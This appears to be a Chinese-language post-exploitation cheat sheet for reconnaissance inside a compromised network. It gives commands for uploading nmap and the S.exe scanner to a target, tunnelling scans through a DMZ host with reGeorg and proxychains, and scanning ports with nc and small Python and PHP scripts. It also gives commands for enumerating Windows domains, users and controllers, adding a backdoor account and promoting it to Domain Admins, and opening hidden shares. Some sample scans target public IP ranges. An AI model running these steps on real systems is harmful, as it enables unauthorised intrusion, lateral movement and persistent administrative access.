端口掃描
nmap是一個跨平臺的信息收集工具,基於命令行,當然也有圖形化界面,znmap,當進入內網後,操作與外網掃描基本一致,只是把對一個ip改爲對一系列的ip地址段進行掃描
namp
1.直接上傳nmap到目標機
1.1掃描內網有多少主機在線
nmap.exe -sP 內網地址段或單個ip
內網地址段:192.168.x.x 172.16.x.x -172.31.x.x 10.x.x.x
2.對在線的某臺機器進行端口掃描
nmap.exe ip
2.通過代理不上傳遠程使用nmap
1.上傳regeorg到內網的dmz
2.通過regeorg進行代理內網的dmz機
python reGeorgSocksProxy.py -u (regeorg上傳地址/tunnel.aspx)
3.修改/etc/proxychains.conf配置文件
socks5 127.0.0.1 8888
4.通過代理的形式使用nmap進行端口掃描
proxychains nmap -sT -Pn -p 80,445,3389 10.1.1.1
s掃描器
S.exe,這個程序是windows下的一款高速掃描程序
1.先將S.exe上傳
2.使用
2.1 TCP掃描218.80.12.1到218.80.12.123這IP段中的80端口,最大併發線程是512
S.exe TCP 218.80.12.1 218.80.12.123 80 512
2.2 TCP掃描218.80.12.1到218.80.12.123這IP段中的21和5631端口,最大併發線程是512,並顯示Banner
S.exe TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner
2.3 TCP掃描218.80.12.1到218.80.12.12這IP段中的1到200端口,最大併發線程是512
S.exe TCP 218.80.12.1 218.80.12.12 1-200 512
2.4 TCP掃描218.80.12.7這IP中的1到200端口,最大併發線程是512,將結果寫入Result.txt,掃描結束後Result.txt就存放在你的S掃描器所在的目錄裏,剛纔掃描的東西都在裏面
S.exe TCP 218.80.12.7 1-200 512 /save
2.5 SYN掃描218.80.12.7這IP中的1到65535端口,將結果寫入Result.txt,掃描結束後Result.txt就存放在你的S掃描器所在的目錄裏,剛纔掃描的東西都在裏面
S.exe SYN 218.80.12.7 1-65535 /Save
2.6 SYN掃描218.80.12.1到218.80.12.255這IP段中的21端口,將結果寫入Result.tx,掃描結束後Result.txt就存放在你的S掃描器所在的目錄裏,剛纔掃描的東西都在裏面
S.exe SYN 218.80.12.1 218.80.12.255 21 /Save
nc
nc是一個網絡工具,可以用來掃描端口
使用:
掃描一個ip的80-445端口
nc -nvv -w2 -z ip 80-445
自寫腳本
php,python,perl,ruby,java,c等程序都可以用來做端口掃描,同時還可以使用bat或者shell腳本來做掃描
python
#!/usr/bin/env python
import socket
def get_ip_status(ip,port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip,port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip,port))
finally:
server.close()
if __name__ == '__main__':
host = '10.0.0.11'
for port in range(20,100):
get_ip_status(host,port)
php
$arr = [80,8080,3306];
foreach ($arr as $port) {
$fp = @fsockopen('172.29.159.198',$port,$errno,$errstr,0.1);
if (!$fp) {
echo $port." closed\n";
}else{
echo $port." Opend\n";
}
}
常見信息收集命令
1.獲取當前組的計算機名
使用條件:server和computer Browser服務都開啓
net view
2.獲取當前所有域
net view /domain
3.獲取workgroup工作組中的計算機列表
net view /domain:hacker
4.獲取計算機名對應的IP地址
ping -n 1 -4 dc
如果計算機名很多的時候,可以利用bat批量ping獲取ip
@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k %%j)
)
)
以下執行命令時候會發送到域控查詢,如果滲透的機器不是域用戶權限,則會報錯
5.查看域中用戶
dsquery user 或者 net user /domain
6.查看域用戶組
net group /domain
7.查詢域管理員
net group "Domain Admins" /domain
Admins處替換其他域組名稱,即可查看其他域組內容
8.添加域用戶
添加普通域用戶
net user lp 123.com /add /domain
將普通域用戶提升爲域管理員
net group "Domain Admins" lp /add /domain
查看用戶信息
net user lp /domain
9.查看當前計算機名,全名,用戶名,系統版本,工作站域,登陸域
net config workstation
10.查詢所有計算機名稱
dsquery computer
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
11.net命令
映射磁盤到本地(高權限用戶)
net use z: \\計算機名或者ip\盤符或者分區
查看共享(看不到$的隱藏共享)
net view \\ip
開啓一個共享名爲app$,在d:\config
net share app$=d:\config
12.路由追蹤
tracert 公網dns地址
13.定位域控
查看域時間及域服務器的名字
net time /domain
查詢域控
net group "Domain Controllers" /domain
通過ipconfig配置查找dns地址
ipconfig /all 拿到dns地址
ping -a dns地址 返回計算機名
14.dsquery的一些使用
列出該域內所有的機器名
dsquery computer domain root -limit 65535 && net group "domain computers" /domain
列出該域內所有用戶名
dsquery user domain root -limit 65535 && net user /domain
列出該域內網段劃分
dsquery subnet
列出該域內分組
dsquery group && net group /domain
列出該域內組織單位
dsquery ou
列出該域內域控制服務器
dsquery server && net time /domain
列出域管理賬號
net group "domain admins" /domain